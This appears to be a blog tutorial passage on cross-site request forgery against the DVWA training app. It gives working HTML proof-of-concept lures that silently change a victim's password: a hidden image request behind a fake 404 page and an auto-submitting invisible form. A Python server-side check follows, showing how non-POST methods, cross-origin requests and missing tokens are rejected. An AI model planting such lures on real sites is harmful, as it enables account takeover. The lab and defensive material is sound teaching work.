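Build a hidden form and submit it with JavaScript, or use an image tag such as:

```html
<img src="http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>
```

to disguise the request and hide its traces, so that the password ends up being changed. I have also borrowed two PoCs from other people to make this easier to show: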
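Image-based lure

```html
<!-- Hidden image: the browser issues the GET request and attaches the victim's session cookie -->
<img src="http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>

<!-- Fake error page shown to the victim -->
<h1>404</h1>

<h2>file not found.</h2>
```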
Hidden-form variant

```html
<body onload="javascript:csrf()">
<script>
// Runs on page load and clicks the submit button of the hidden form
function csrf(){
document.getElementById("button").click();
}
</script>
<style>
/* Keep the form invisible to the victim */
form{
display:none;
}
</style>
<form action="http://www.dvwa.com/vulnerabilities/csrf/?" method="GET">
New password:<br />
<input type="password" AUTOCOMPLETE="off" name="password_new" value="test"><br />
Confirm new password:<br />
<input type="password" AUTOCOMPLETE="off" name="password_conf" value="test"><br />
<br />
<input type="submit" id="button" name="Change" value="Change" />
</form>
</body>
```
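
Both PoCs work because the password change is a plain GET request authenticated only by the session cookie. The following server-side check is an added example, not code from the original post or from DVWA; it shows the conditions that would reject both requests. The `SITE_ORIGIN` value, the `user_token` field name, the `attacker.example` host and the sample requests are assumptions constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://www.dvwa.com"  # assumption: origin of the protected app


def origin_of(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def check_password_change(method, headers, params, session):
    """Return (allowed, reason). headers uses lower-cased names; session is server-side."""
    # 1. <img src=...> and method="GET" forms can only issue GET, so a state
    #    change must never be reachable that way.
    if method.upper() != "POST":
        return False, "state change over non-POST method"
    # 2. Reject a request whose Origin (or Referer as fallback) is another site.
    source = headers.get("origin") or headers.get("referer")
    if source and origin_of(source) != SITE_ORIGIN:
        return False, "cross-origin request"
    # 3. Require the per-session token; compare as bytes in constant time so a
    #    non-ASCII value is rejected instead of raising TypeError.
    expected = session.get("csrf_token", "")
    supplied = params.get("user_token", "")  # hypothetical hidden field name
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    if params.get("password_new") != params.get("password_conf"):
        return False, "passwords do not match"
    return True, "ok"


def demo():
    session = {"csrf_token": secrets.token_urlsafe(32)}  # issued when the real form is rendered
    pw = {"password_new": "test", "password_conf": "test", "Change": "Change"}
    requests = [  # constructed sample requests
        ("GET", {"referer": "http://attacker.example/404.html"}, pw),  # both PoCs above
        ("POST", {"origin": "http://attacker.example"}, pw),  # cross-site POST
        ("POST", {"origin": SITE_ORIGIN}, pw),  # same origin, token missing
        ("POST", {"origin": SITE_ORIGIN}, {**pw, "user_token": session["csrf_token"]}),
    ]
    return [check_password_change(m, h, p, session) for m, h, p in requests]


if __name__ == "__main__":
    for allowed, reason in demo():
        print(allowed, reason)
```

Only the last constructed request, a same-origin POST carrying the session's token, is accepted.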
(Editor: PHP编程网 - 湛江站长网)